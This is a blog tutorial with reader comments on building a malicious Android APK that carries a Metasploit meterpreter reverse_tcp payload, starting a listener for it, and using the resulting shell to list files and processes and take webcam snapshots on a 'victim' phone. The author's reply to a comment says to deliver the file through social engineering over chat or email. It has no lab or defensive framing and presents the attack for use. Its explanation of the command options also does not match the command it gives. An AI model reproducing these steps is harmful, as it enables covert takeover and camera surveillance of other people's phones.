Hack Android Phone with Metasploit in Kali Linux

Open Kali Linux Terminal and type


msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.6 lport= 443 R > /root/Desktop/files.apk



-p for payload
android/meterpreter/reverse_tcp
Lhost (IP address of your local host)
192.168.1.6
Lport (Port of your local pc)
443
-x format
Output format

Now we successfully generate the malicious apk File, it will stored on your local computer

/root/Desktop/files.apk

Now open your kli linux terminal and type msfconsole


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.6
set lport 443
exploit

Now send your files.apk files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim Android Phone.


LS
As in Linux, the ‘ls’ command will list the files in the current remote directory.


PS
The ‘ps’ command displays a list of running processes on the target.


Webcam_list

This command provides you a list of all webcams on the target system. Each webcam will have an index number.

Webcam_snap 1

This command take a snapshot for the specified webcam, by default number 1 and will try without argument precision to open the saved snapshot

4 comments:

Unknown said...

how to send the file to the victim??

raj@hackingarticles.in said...

use any social enginnering technique via chat email

Unknown said...

Helo
When I enter the coman my kali said :
Invalid payload android/meterpreter/reverse_txp

raj@hackingarticles.in said...

payload is android/meterpreter/reverse_tcp

Post a Comment